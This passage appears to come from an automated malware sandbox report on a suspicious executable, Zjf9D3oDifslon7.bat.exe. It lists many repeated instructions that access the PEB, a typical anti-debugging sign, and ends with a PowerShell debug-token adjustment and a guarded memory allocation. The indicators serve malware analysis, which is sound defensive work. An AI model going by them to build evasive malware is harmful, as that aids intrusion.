                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01878402 mov eax, dword ptr fs:[00000030h]5_2_01878402
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183E420 mov eax, dword ptr fs:[00000030h]5_2_0183E420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183E420 mov eax, dword ptr fs:[00000030h]5_2_0183E420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183E420 mov eax, dword ptr fs:[00000030h]5_2_0183E420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183C427 mov eax, dword ptr fs:[00000030h]5_2_0183C427
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A430 mov eax, dword ptr fs:[00000030h]5_2_0187A430
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FA456 mov eax, dword ptr fs:[00000030h]5_2_018FA456
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186245A mov eax, dword ptr fs:[00000030h]5_2_0186245A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183645D mov eax, dword ptr fs:[00000030h]5_2_0183645D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC460 mov ecx, dword ptr fs:[00000030h]5_2_018CC460
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186A470 mov eax, dword ptr fs:[00000030h]5_2_0186A470
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186A470 mov eax, dword ptr fs:[00000030h]5_2_0186A470
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186A470 mov eax, dword ptr fs:[00000030h]5_2_0186A470
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E678E mov eax, dword ptr fs:[00000030h]5_2_018E678E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018407AF mov eax, dword ptr fs:[00000030h]5_2_018407AF
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F47A0 mov eax, dword ptr fs:[00000030h]5_2_018F47A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184C7C0 mov eax, dword ptr fs:[00000030h]5_2_0184C7C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C07C3 mov eax, dword ptr fs:[00000030h]5_2_018C07C3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018627ED mov eax, dword ptr fs:[00000030h]5_2_018627ED
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018627ED mov eax, dword ptr fs:[00000030h]5_2_018627ED
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018627ED mov eax, dword ptr fs:[00000030h]5_2_018627ED
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE7E1 mov eax, dword ptr fs:[00000030h]5_2_018CE7E1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018447FB mov eax, dword ptr fs:[00000030h]5_2_018447FB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018447FB mov eax, dword ptr fs:[00000030h]5_2_018447FB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C700 mov eax, dword ptr fs:[00000030h]5_2_0187C700
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840710 mov eax, dword ptr fs:[00000030h]5_2_01840710
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01870710 mov eax, dword ptr fs:[00000030h]5_2_01870710
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C720 mov eax, dword ptr fs:[00000030h]5_2_0187C720
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C720 mov eax, dword ptr fs:[00000030h]5_2_0187C720
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BC730 mov eax, dword ptr fs:[00000030h]5_2_018BC730
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187273C mov eax, dword ptr fs:[00000030h]5_2_0187273C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187273C mov ecx, dword ptr fs:[00000030h]5_2_0187273C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187273C mov eax, dword ptr fs:[00000030h]5_2_0187273C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187674D mov esi, dword ptr fs:[00000030h]5_2_0187674D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187674D mov eax, dword ptr fs:[00000030h]5_2_0187674D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187674D mov eax, dword ptr fs:[00000030h]5_2_0187674D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE75D mov eax, dword ptr fs:[00000030h]5_2_018CE75D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840750 mov eax, dword ptr fs:[00000030h]5_2_01840750
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882750 mov eax, dword ptr fs:[00000030h]5_2_01882750
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882750 mov eax, dword ptr fs:[00000030h]5_2_01882750
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C4755 mov eax, dword ptr fs:[00000030h]5_2_018C4755
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848770 mov eax, dword ptr fs:[00000030h]5_2_01848770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844690 mov eax, dword ptr fs:[00000030h]5_2_01844690
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844690 mov eax, dword ptr fs:[00000030h]5_2_01844690
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C6A6 mov eax, dword ptr fs:[00000030h]5_2_0187C6A6
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018766B0 mov eax, dword ptr fs:[00000030h]5_2_018766B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0187A6C7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A6C7 mov eax, dword ptr fs:[00000030h]5_2_0187A6C7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE6F2 mov eax, dword ptr fs:[00000030h]5_2_018BE6F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE6F2 mov eax, dword ptr fs:[00000030h]5_2_018BE6F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE6F2 mov eax, dword ptr fs:[00000030h]5_2_018BE6F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE6F2 mov eax, dword ptr fs:[00000030h]5_2_018BE6F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C06F1 mov eax, dword ptr fs:[00000030h]5_2_018C06F1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C06F1 mov eax, dword ptr fs:[00000030h]5_2_018C06F1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE609 mov eax, dword ptr fs:[00000030h]5_2_018BE609
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882619 mov eax, dword ptr fs:[00000030h]5_2_01882619
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E627 mov eax, dword ptr fs:[00000030h]5_2_0185E627
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01876620 mov eax, dword ptr fs:[00000030h]5_2_01876620
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01878620 mov eax, dword ptr fs:[00000030h]5_2_01878620
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184262C mov eax, dword ptr fs:[00000030h]5_2_0184262C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185C640 mov eax, dword ptr fs:[00000030h]5_2_0185C640
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A660 mov eax, dword ptr fs:[00000030h]5_2_0187A660
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A660 mov eax, dword ptr fs:[00000030h]5_2_0187A660
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01872674 mov eax, dword ptr fs:[00000030h]5_2_01872674
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190866E mov eax, dword ptr fs:[00000030h]5_2_0190866E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190866E mov eax, dword ptr fs:[00000030h]5_2_0190866E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018409AD mov eax, dword ptr fs:[00000030h]5_2_018409AD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018409AD mov eax, dword ptr fs:[00000030h]5_2_018409AD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C89B3 mov esi, dword ptr fs:[00000030h]5_2_018C89B3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C89B3 mov eax, dword ptr fs:[00000030h]5_2_018C89B3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C89B3 mov eax, dword ptr fs:[00000030h]5_2_018C89B3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190A9D3 mov eax, dword ptr fs:[00000030h]5_2_0190A9D3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D69C0 mov eax, dword ptr fs:[00000030h]5_2_018D69C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018749D0 mov eax, dword ptr fs:[00000030h]5_2_018749D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE9E0 mov eax, dword ptr fs:[00000030h]5_2_018CE9E0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018729F9 mov eax, dword ptr fs:[00000030h]5_2_018729F9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018729F9 mov eax, dword ptr fs:[00000030h]5_2_018729F9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE908 mov eax, dword ptr fs:[00000030h]5_2_018BE908
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE908 mov eax, dword ptr fs:[00000030h]5_2_018BE908
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01838918 mov eax, dword ptr fs:[00000030h]5_2_01838918
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01838918 mov eax, dword ptr fs:[00000030h]5_2_01838918
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC912 mov eax, dword ptr fs:[00000030h]5_2_018CC912
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C892A mov eax, dword ptr fs:[00000030h]5_2_018C892A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D892B mov eax, dword ptr fs:[00000030h]5_2_018D892B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C0946 mov eax, dword ptr fs:[00000030h]5_2_018C0946
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01866962 mov eax, dword ptr fs:[00000030h]5_2_01866962
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01866962 mov eax, dword ptr fs:[00000030h]5_2_01866962
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01866962 mov eax, dword ptr fs:[00000030h]5_2_01866962
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188096E mov eax, dword ptr fs:[00000030h]5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188096E mov edx, dword ptr fs:[00000030h]5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188096E mov eax, dword ptr fs:[00000030h]5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC97C mov eax, dword ptr fs:[00000030h]5_2_018CC97C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E4978 mov eax, dword ptr fs:[00000030h]5_2_018E4978
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E4978 mov eax, dword ptr fs:[00000030h]5_2_018E4978
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840887 mov eax, dword ptr fs:[00000030h]5_2_01840887
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC89D mov eax, dword ptr fs:[00000030h]5_2_018CC89D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E8C0 mov eax, dword ptr fs:[00000030h]5_2_0186E8C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190A8E4 mov eax, dword ptr fs:[00000030h]5_2_0190A8E4
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C8F9 mov eax, dword ptr fs:[00000030h]5_2_0187C8F9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C8F9 mov eax, dword ptr fs:[00000030h]5_2_0187C8F9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC810 mov eax, dword ptr fs:[00000030h]5_2_018CC810
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov ecx, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E483A mov eax, dword ptr fs:[00000030h]5_2_018E483A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E483A mov eax, dword ptr fs:[00000030h]5_2_018E483A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A830 mov eax, dword ptr fs:[00000030h]5_2_0187A830
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01870854 mov eax, dword ptr fs:[00000030h]5_2_01870854
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844859 mov eax, dword ptr fs:[00000030h]5_2_01844859
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844859 mov eax, dword ptr fs:[00000030h]5_2_01844859
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D6870 mov eax, dword ptr fs:[00000030h]5_2_018D6870
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D6870 mov eax, dword ptr fs:[00000030h]5_2_018D6870
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE872 mov eax, dword ptr fs:[00000030h]5_2_018CE872
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE872 mov eax, dword ptr fs:[00000030h]5_2_018CE872
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850BBE mov eax, dword ptr fs:[00000030h]5_2_01850BBE
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850BBE mov eax, dword ptr fs:[00000030h]5_2_01850BBE
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F4BB0 mov eax, dword ptr fs:[00000030h]5_2_018F4BB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F4BB0 mov eax, dword ptr fs:[00000030h]5_2_018F4BB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840BCD mov eax, dword ptr fs:[00000030h]5_2_01840BCD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840BCD mov eax, dword ptr fs:[00000030h]5_2_01840BCD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840BCD mov eax, dword ptr fs:[00000030h]5_2_01840BCD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01860BCB mov eax, dword ptr fs:[00000030h]5_2_01860BCB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01860BCB mov eax, dword ptr fs:[00000030h]5_2_01860BCB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01860BCB mov eax, dword ptr fs:[00000030h]5_2_01860BCB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EEBD0 mov eax, dword ptr fs:[00000030h]5_2_018EEBD0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848BF0 mov eax, dword ptr fs:[00000030h]5_2_01848BF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848BF0 mov eax, dword ptr fs:[00000030h]5_2_01848BF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848BF0 mov eax, dword ptr fs:[00000030h]5_2_01848BF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186EBFC mov eax, dword ptr fs:[00000030h]5_2_0186EBFC
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CCBF0 mov eax, dword ptr fs:[00000030h]5_2_018CCBF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186EB20 mov eax, dword ptr fs:[00000030h]5_2_0186EB20
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186EB20 mov eax, dword ptr fs:[00000030h]5_2_0186EB20
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01908B28 mov eax, dword ptr fs:[00000030h]5_2_01908B28
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01908B28 mov eax, dword ptr fs:[00000030h]5_2_01908B28
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F4B4B mov eax, dword ptr fs:[00000030h]5_2_018F4B4B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F4B4B mov eax, dword ptr fs:[00000030h]5_2_018F4B4B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E8B42 mov eax, dword ptr fs:[00000030h]5_2_018E8B42
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D6B40 mov eax, dword ptr fs:[00000030h]5_2_018D6B40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Memory allocated: page read and write | page guard

